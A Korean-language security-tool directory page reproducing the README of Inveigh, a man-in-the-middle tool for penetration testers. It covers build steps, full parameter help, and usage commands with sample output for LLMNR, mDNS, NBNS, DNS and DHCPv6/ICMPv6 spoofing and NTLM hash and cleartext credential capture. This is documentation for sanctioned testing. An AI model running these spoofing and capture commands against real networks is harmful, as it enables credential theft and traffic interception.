Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Inveigh — .NET IPv4/IPv6 침투 테스터용 중간자 공격 도구 | Kitploit
도구/GitHubGitHub/kevin-robertson/inveigh
Penetration TestingRed Teaming
GitHubkevin-robertson/inveigh

Inveigh

.NET IPv4/IPv6 침투 테스터용 중간자 공격 도구

저장소 보기
3.0k47259개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Inveigh

Inveigh는 침투 테스터를 위한 크로스 플랫폼 .NET IPv4/IPv6 중간자 공격 도구입니다. 이 저장소에는 기본 C# 버전과 레거시 PowerShell 버전이 포함되어 있습니다.

개요

Inveigh는 패킷 스니핑과 프로토콜별 리스너/소켓을 통해 스푸핑 공격과 해시/자격 증명 캡처를 수행합니다. 이 도구의 원래 PowerShell 버전의 기반이었던 패킷 스니핑 방식은 다음과 같은 장점이 있습니다:

  • Windows SMB 서비스를 통한 SMB NTLM 챌린지/응답 캡처
  • 호스트 시스템에 표시되는 포트 바인드가 적음

주요 단점은 상승된 액세스 권한이 필요하다는 것입니다.

현재 Windows 버전에서는 기본적으로 실행되는 UDP 서비스가 포트 재사용을 허용합니다. 따라서 패킷 스니핑은 사용 중인 UDP 포트를 우회하는 데 더 이상 이점을 제공하지 않습니다. Inveigh의 UDP 리스너는 모두 포트 재사용을 활용하도록 구성되어 있습니다.

버전 설명

  • PowerShell Inveigh - 수년에 걸쳐 개발된 원래 버전입니다. 현재로서는 적어도 이 버전(1.506)은 추가 업데이트 없이 유지됩니다. 문서는 여기에서 찾을 수 있습니다.
  • C# Inveigh (일명 InveighZero) - 원래 C# POC 코드와 PowerShell 버전 코드의 대부분을 C#으로 포팅한 것이 결합된 버전입니다. 이 버전은 이제 C#용으로 재구축되었으며 주 버전으로 사용되고 있습니다.

기능

Inveigh의 C# 버전은 다음 프로토콜에 대한 공격을 포함합니다:

  • LLMNR [패킷 스니퍼 | 리스너]
  • DNS [패킷 스니퍼 | 리스너]
  • mDNS [패킷 스니퍼 | 리스너]
  • NBNS [패킷 스니퍼 | 리스너]
  • DHCPv6 [패킷 스니퍼 | 리스너]
  • ICMPv6 [권한 있는 원시 소켓]
  • HTTP [리스너]
  • HTTPS [리스너]
  • SMB [패킷 스니퍼 | 리스너]
  • LDAP [리스너]
  • WebDAV [리스너]
  • Proxy Auth [리스너]

Inveigh는 기본 프로토콜에서 두 가지를 모두 지원하는 경우 IPv4와 IPv6 모두에서 작동합니다.

크로스 플랫폼 지원

Inveigh의 SDK 스타일 프로젝트 파일은 .NET 3.5, 4.6.2 및 6.0용으로 설정되어 있으며, 6.0은 Linux 및 macOS에서도 작동하는 버전입니다.

<TargetFrameworks>net35;net62;net6.0</TargetFrameworks>

알려진 문제

  • 패킷 스니퍼는 원시 소켓 설정의 차이로 인해 Windows에서만 사용할 수 있습니다. Linux 또는 macOS용으로 컴파일하면 패킷 스니퍼가 비활성화됩니다. 대신 포트 445가 열려 있는 경우 Inveigh의 SMB 리스너를 사용할 수 있습니다.
  • macOS는 멀티캐스트 그룹에 가입하려면 경로를 사용할 수 있어야 합니다. 제 테스트에서는 이 플랫폼에서 해당 공격을 수행하기 위해 DHCPv6 멀티캐스트 경로를 추가해야 했습니다.
    sudo route -nv add -net ff02::1:2 -interface en0

실행

dotnet Inveigh.dll

Linux/macOS 플랫폼 대상 빌드

  • 대상 시스템에 .NET 6.0이 설치된 경우
    dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
    dotnet publish -r osx-x64 -f net8.0 -p:AssemblyName=inveigh

  • 대상 시스템에 .NET 6.0이 설치되지 않은 경우
    dotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
    dotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net8.0 -p:AssemblyName=inveigh

사용법

기본 매개변수 값은 Program.cs의 시작 부분에 있습니다. 컴파일하기 전에 모든 내용을 검토하여 필요에 맞게 설정할 것을 권장합니다. 모든 활성화/비활성화 매개변수는 Y/N 값으로 설정할 수 있습니다.``` //begin parameters - set defaults as needed before compile public static string argCert = "MIIKaQIBAzCCC..." public static string argCertPassword = "password"; public static string argChallenge = ""; public static string argConsole = "5"; public static string argConsoleLimit = "-1"; public static string argConsoleStatus = "0"; public static string argConsoleUnique = "Y"; public static string argDHCPv6 = "N"; public static string argDHCPv6TTL = "30"; public static string argDNS = "Y"; ... //end parameters

root@kitploit:~
### 매개변수 도움말```
.\Inveigh.exe -?

Control:

  -Inspect        Default=Disabled: (Y/N) inspect traffic only.

  -IPv4           Default=Enabled: (Y/N) IPv4 spoofing/capture.

  -IPv6           Default=Enabled: (Y/N) IPv6 spoofing/capture.

  -RunCount       Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.

  -RunTime        Default=Unlimited: Run time duration in minutes.


Output:

  -Console        Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)  

  -ConsoleLimit   Default=Unlimited: Limit to queued console entries.

  -ConsoleStatus  Default=Disabled: Interval in minutes for auto-displaying capture details.

  -ConsoleUnique  Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.

  -FileDirectory  Default=Working Directory: Valid path to an output directory for enabled file output.

  -FileOutput     Default=Enabled: (Y/N) real time file output.

  -FilePrefix     Default=Inveigh: Prefix for all output files.

  -FileUnique     Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.

  -LogOutput      Default=Disabled: (Y/N) outputting log entries.


Spoofers:

  -DHCPV6         Default=Disabled: (Y/N) DHCPv6 spoofing.

  -DHCPv6TTL      Default=300: Lease lifetime in seconds.

  -DNS            Default=Enabled: (Y/N) DNS spoofing.

  -DNSHost        Fully qualified hostname to use SOA/SRV responses.

  -DNSSRV         Default=LDAP: Comma separated list of SRV request services to answer.

  -DNSSuffix      DNS search suffix to include in DHCPv6/ICMPv6 responses.

  -DNSTTL         Default=30: DNS TTL in seconds.

  -DNSTYPES       Default=A: (A, AAAA, SOA, SRV) Comma separated list of DNS types to spoof.

  -ICMPv6         Default=Enabled: (Y/N) sending ICMPv6 router advertisements.

  -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
  
  -ICMPv6TTL	  Default=300: ICMPv6 TTL in seconds.

  -IgnoreDomains  Default=None: Comma separated list of domains to ignore when spoofing.



  -IgnoreIPs      Default=Local: Comma separated list of source IP addresses to ignore when spoofing.

  -IgnoreMACs     Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
  
  -IgnoreQueries  Default=None: Comma separated list of name queries to ignore when spoofing.

  -Local          Default=Disabled: (Y/N) performing spoofing attacks against the host system.

  -LLMNR          Default=Enabled: (Y/N) LLMNR spoofing.

  -LLMNRTTL       Default=30: LLMNR TTL in seconds.

  -MAC            Local MAC address for DHCPv6.

  -MDNS           Default=Enabled: (Y/N) mDNS spoofing.

  -MDNSQuestions  Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)

  -MDNSTTL        Default=120: mDNS TTL in seconds.

  -MDNSTypes      Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)

  -MDNSUnicast    Default=Enabled: (Y/N) sending a unicast only response to a QM request.

  -NBNS           Default=Disabled: (Y/N) NBNS spoofing.

  -NBNSTTL        Default=165: NBNS TTL in seconds.

  -NBNSTypes      Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)

  -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.

  -ReplyToIPs     Default=All: Comma separated list of source IP addresses to respond to when spoofing.

  -ReplyToMACs    Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
  
  -ReplyToQueries Default=All: Comma separated list of name queries to respond to when spoofing.

  -SpooferIP      Default=Autoassign: IP address included in spoofing responses.

  -SpooferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -Repeat         Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.


Capture:

  -Cert           Base64 certificate for TLS.

  -CertPassword   Base64 certificate password for TLS.

  -Challenge      Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.

  -HTTP           Default=Enabled: (Y/N) HTTP listener.

  -HTTPAuth       Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.

  -HTTPPorts      Default=80: Comma seperated list of TCP ports for the HTTP listener.

  -HTTPRealm      Default=ADFS: Basic authentication realm.

  -HTTPResponse   Content to serve as the default HTTP/HTTPS/Proxy response.

  -HTTPS          Default=Enabled: (Y/N) HTTPS listener.

  -HTTPSPorts     Default=443: Comma separated list of TCP ports for the HTTPS listener.

  -IgnoreAgents   Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.

  -LDAP           Default=Enabled: (Y/N) LDAP listener.

  -LDAPPorts      Default=389: Comma separated list of TCP ports for the LDAP listener.

  -ListenerIP     Default=Any: IP address for all listeners.

  -ListenerIPv6   Default=Any: IPv6 address for all listeners.

  -MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures.

  -Proxy          Default=Disabled: (Y/N) proxy listener authentication captures.

  -ProxyAuth      Default=NTLM: (Basic/NTLM) Proxy authentication.

  -ProxyPort      Default=8492: Port for the proxy listener.

  -SMB            Default=Enabled: (Y/N) SMB sniffer/listener.

  -SMBPorts       Default=445: Port for the SMB listener.

  -SnifferIP      Default=Autoassign: IP address included in spoofing responses.

  -SnifferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -WebDAV         Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.

  -WebDAVAuth     Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.

  -WPADAuth       Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)

  -WPADResponse   Default=Autogenerated: Contents of wpad.dat responses.

기본 (로컬 IP 자동 감지)```

.\Inveigh.exe [] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588] [+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] [+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] [-] DHCPv6 [+] DNS Packet Sniffer [Type A] [-] ICMPv6 [+] LLMNR Packet Sniffer [Type A] [-] MDNS [-] NBNS [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] [-] HTTPS [+] WebDAV [WebDAVAuth NTLM] [-] Proxy [+] LDAP Listener [Port 389] [+] SMB Packet Sniffer [Port 445] [+] File Output [C:\Users\dev\source\repos\Inveigh\Inveigh\bin\Debug\net35] [+] Previous Session Files [Imported] [] Press ESC to enter/exit interactive console

root@kitploit:~
### 수신 전용 모드 (비활성화된 패킷 스니퍼)```
.\Inveigh.exe -sniffer n
[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368]
[-] Packet Sniffer
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Listener [Type A]
[-] ICMPv6
[+] LLMNR Listener [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Listener [Port 445]
[+] File Output [C:\Users\dev\source\repos\InveighZero\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
[!] Failed to start SMB listener on port 445, check IP and port usage.
[!] Failed to start SMB listener on port 445, check IP and port usage.

참고: 패킷 스니퍼가 비활성화된 상태에서 Inveigh는 IPv4 및 IPv6에 대한 SMB 리스너를 시작하려고 시도합니다. 대부분의 Windows 시스템에서는 포트 445가 이미 사용 중입니다. 오류를 무시하거나 -smb n 옵션을 추가하십시오.

DHCPv6

DHCPv6 스푸퍼와 IPv6 DNS 스푸퍼를 시작합니다. 참고, DNS는 기본적으로 활성화되어 있습니다.``` .\Inveigh.exe -dhcpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] ... [+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16] [+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16]

root@kitploit:~
DHCPv6 스푸퍼를 시작하고 내부 도메인에 대해서만 DNS 요청을 스푸핑합니다.```
.\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored]
[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent]

DHCPv6 스푸퍼를 시작하고 또한 ICMPv6 RA 패킷을 보냅니다.``` .\Inveigh.exe -dhcpv6 y -icmpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] [+] ICMPv6 Router Advertisement [Interval 200 Seconds] ... [+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1]

root@kitploit:~
DHCPv6 스푸퍼를 시작하고 로컬 호스트의 요청에 응답합니다.```
.\Inveigh.exe -dhcpv6 y -local y
...
[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled]
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]

DNS

A 레코드 외에도 SRV 요청을 스푸핑합니다.``` .\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org ... [+] DNS Listener [Types A:SRV] ... [+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [response sent]

root@kitploit:~
### <a name="ICMPv6"></a>ICMPv6
로컬 서브넷 시스템에 보조 IPv6 DNS 서버를 주입하기 위해 ICMPv6 패킷을 전송합니다.```
.\Inveigh.exe -icmpv6 y
...
[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds]
...
[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1]

로컬 서브넷 시스템에 추가 DNS 검색 접미사를 주입하기 위해 ICMPv6 패킷을 전송합니다.``` .\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net ... [+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds] ... [+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1]

root@kitploit:~
### <a name="LLMNR"></a>LLMNR
AAAA 요청을 A 대신 스푸핑합니다.```
.\Inveigh.exe -llmnrtypes AAAA
...
[+] LLMNR Listener [Type AAAA]
...
[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored]
[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent]
[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent]

mDNS

mDNS 스푸퍼를 시작하고 QM 요청에 유니캐스트 응답을 보냅니다.``` .\Inveigh.exe -mdns y ... [+] MDNS Listener [Questions QU:QM | Type A] ... [+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent] [+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored]

root@kitploit:~
mDNS 스푸퍼를 시작하고 QM 요청에 멀티캐스트 응답을 보냅니다.```
.\Inveigh.exe -mdns y -mdnsunicast n
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]

NBNS

NBNS 스푸퍼 시작``` .\Inveigh.exe -nbns y ... [+] NBNS Listener [Types 00:20] ... [+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent]

root@kitploit:~
### <a name="HTTP"></a>HTTP
포트 80에서 HTTP 리스너 시작 (기본적으로 활성화됨)```
.\Inveigh.exe 
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
...

여러 포트에서 HTTP 리스너 시작``` .\Inveigh.exe -httpports 80,8080 ... [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080] ...

root@kitploit:~
### <a name="HTTPS"></a>HTTPS
포트 443에서 Inveigh의 기본 인증서로 HTTPS 리스너 시작```
.\Inveigh.exe -https y
...
[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443]
...

SMB

SMB 패킷 스니퍼 시작 (기본적으로 활성화됨)``` .\Inveigh.exe ... [+] SMB Packet Sniffer [Port 445] ...

root@kitploit:~
포트 445에서 SMB 리스너 시작```
.\Inveigh.exe -sniffer n
...
[+] SMB Listener [Port 445]
...

LDAP

LDAP 리스너를 포트 389에서 시작합니다``` .\Inveigh.exe ... [+] LDAP Listener [Port 389] ...

root@kitploit:~
### <a name="WebDAV"></a>WebDAV
WebDAV 지원을 사용하여 HTTP 리스너를 시작합니다 (기본적으로 활성화됨)```
.\Inveigh.exe
...
[+] WebDAV [WebDAVAuth NTLM]
...

프록시 인증

포트 8492에서 프록시 인증 캡처를 활성화합니다``` .\Inveigh.exe -proxy y ... [+] Proxy Listener [ProxyAuth NTLM | Port 8492] ...

root@kitploit:~
## Console

Inveigh는 도구가 실행 중일 때 접근 가능한 콘솔을 포함합니다(escape 키를 눌러 진입 및 종료). 콘솔은 캡처된 자격 증명/해시 및 기타 다양한 정보에 쉽게 접근할 수 있도록 합니다. 콘솔 프롬프트는 unique:total 형식으로 일반 텍스트, NTLMv1 및 NTLMv2 캡처 수에 대한 실시간 업데이트를 제공합니다. 참고로, C2를 통해 실행 중일 때는 콘솔에 접근하지 못할 수 있습니다.

### Interactive Console Help - ? 또는 HELP 입력```
=============================================== Inveigh Console Commands ===============================================

Command                           Description
========================================================================================================================
GET CONSOLE                     | get queued console output
GET DHCPv6Leases                | get DHCPv6 assigned IPv6 addresses
GET LOG                         | get log entries; add search string to filter results
GET NTLMV1                      | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2                      | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE                | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE                | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT                   | get captured cleartext credentials
GET CLEARTEXTUNIQUE             | get unique captured cleartext credentials
GET REPLYTODOMAINS              | get ReplyToDomains parameter startup values
GET REPLYTOIPS                  | get ReplyToIPs parameter startup values
GET REPLYTOMACS                 | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES              | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS               | get IgnoreDomains parameter startup values
GET IGNOREIPS                   | get IgnoreIPs parameter startup values
GET IGNOREMACS                  | get IgnoreMACs parameter startup values
GET IGNOREQUERIES               | get IgnoreQueries parameter startup values
SET CONSOLE                     | set Console parameter value
HISTORY                         | get command history
RESUME                          | resume real time console output
STOP                            | stop Inveigh

대화형 콘솔 프롬프트

콘솔 프롬프트에는 실시간 캡처 횟수가 포함됩니다.``` C(0:0) NTLMv1(0:0) NTLMv2(0:0)>

root@kitploit:~
Cleartext(unique:total) NTLMv1(unique:total) NTLMv2(unique:total)

## Quiddity

Inveigh에서 사용하는 프로토콜 라이브러리는 [여기](https://github.com/Kevin-Robertson/Quiddity)에 있습니다.

## 특별 감사  
* Responder - https://github.com/lgandx/Responder  
* Impacket - https://github.com/SecureAuthCorp/impacket  
* mitm6 - https://github.com/fox-it/mitm6
도구 다운로드